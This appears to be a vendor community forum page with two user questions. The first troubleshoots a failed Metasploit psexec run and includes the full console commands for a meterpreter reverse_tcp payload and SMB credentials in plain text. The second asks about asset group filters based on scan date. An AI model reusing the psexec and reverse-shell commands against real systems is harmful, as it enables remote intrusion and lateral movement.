Knowledge Base

Ask A Question



psexec exploit in metasploit

Hi All, Please see the error message when running exploit. It does not seem to get past authentication. msf exploit(windows/smb/psexec) > use exploit/windows/smb/psexec msf exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf exploit(windows/smb/psexec) > set RHOST RHOST => msf exploit(windows/smb/psexec) > set LHOST LHOST => msf exploit(windows/smb/psexec) > set SMBDomain CORP SMBDomain => CORP msf exploit(windows/smb/psexec) > set SMBUser "localadmin" SMBUser => localadmin msf exploit(windows/smb/psexec) > set SMBPass "MrPassw0rd" SMBPass => MrPassw0rd msf exploit(windows/smb/psexec) > set LPORT 4444 LPORT => 443 msf exploit(windows/smb/psexec) > exploit [*] Started reverse TCP handler on [*] - Connecting to the server... [*] - Authenticating to| as user 'CORP\localadmin'... [-] - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: An existing connection was forcibly closed by the remote host. [*] Exploit completed, but no session was created. msf exploit(windows/smb/psexec) > version Framework: 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b Console : 4.16.47-dev-b4e392e32287d35c3358e5937ba4e09d22ea813b I tested authentication by running the sysinternals psexec Outside of metasploit. psexec was successful. C:\Users\Administrator>SysinternalsSuite\PsExec.exe \\ -u CORP\localadmin cmd PsExec v2.2 - Execute processes remotely Copyright (C) 2001-2016 Mark Russinovich Sysinternals - Password: Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami CORP\localadmin Same result by using exploit psexec_psh. Please give advice. Thanks. Regards, AA

Posted by aa about a year ago


AD connection, "Last scan date" in DAG and no devices returned

Hi, got an issue with a DAG outcome. I have a site_A populated by AD connection with devices. Works well - it populates the site_A with names and OS, but not with IP addresses of the devices. Understood, need to do discovery to get IPs. I have no scans scheduled for site_A as it only serves as the AD connection population target. Than I have a DAG which filters the devices from site_A based on this filter: Site name - is - "site_A" Last scan date - earlier than - 1 day (1 day is for testing only, in production I will have 30 or so) The problem is that if site_A has just been populated with fresh new devices from AD connection the DAG won't return any devices regardless of the "last scan date" filter condition setting - I've tried both complementary options: (Last scan date - earlier than - 1 day) and (Last scan date - within the last - 1 day). DAG just don't show any devices from site_A. When I delete the second condition with "last scan date" and keep only the "site name..."condition the DAG correctly returns all the devices in site_A. I have also waited one, two and three days to check if days play any role in the DAG generating - but they obviously don't as I have been getting the same results each day. Am I doing anything wrong? Can anyone help? My aim is to scan the devices from site_A by small portions every day - so I thought I would manually run a scan for a small portion of devices each day until all of them are scanned and then let a site based on the DAG to be scanned every day on schedule. With the condition "Last scan date - earlier than - 30 days ago" in the DAG the daily scans will do only a small portion of devices which have not been scanned within last 30 days forever. Any better idea how to achieve that is also welcome. Thanks.

Posted by Jiri Dohnal about a year ago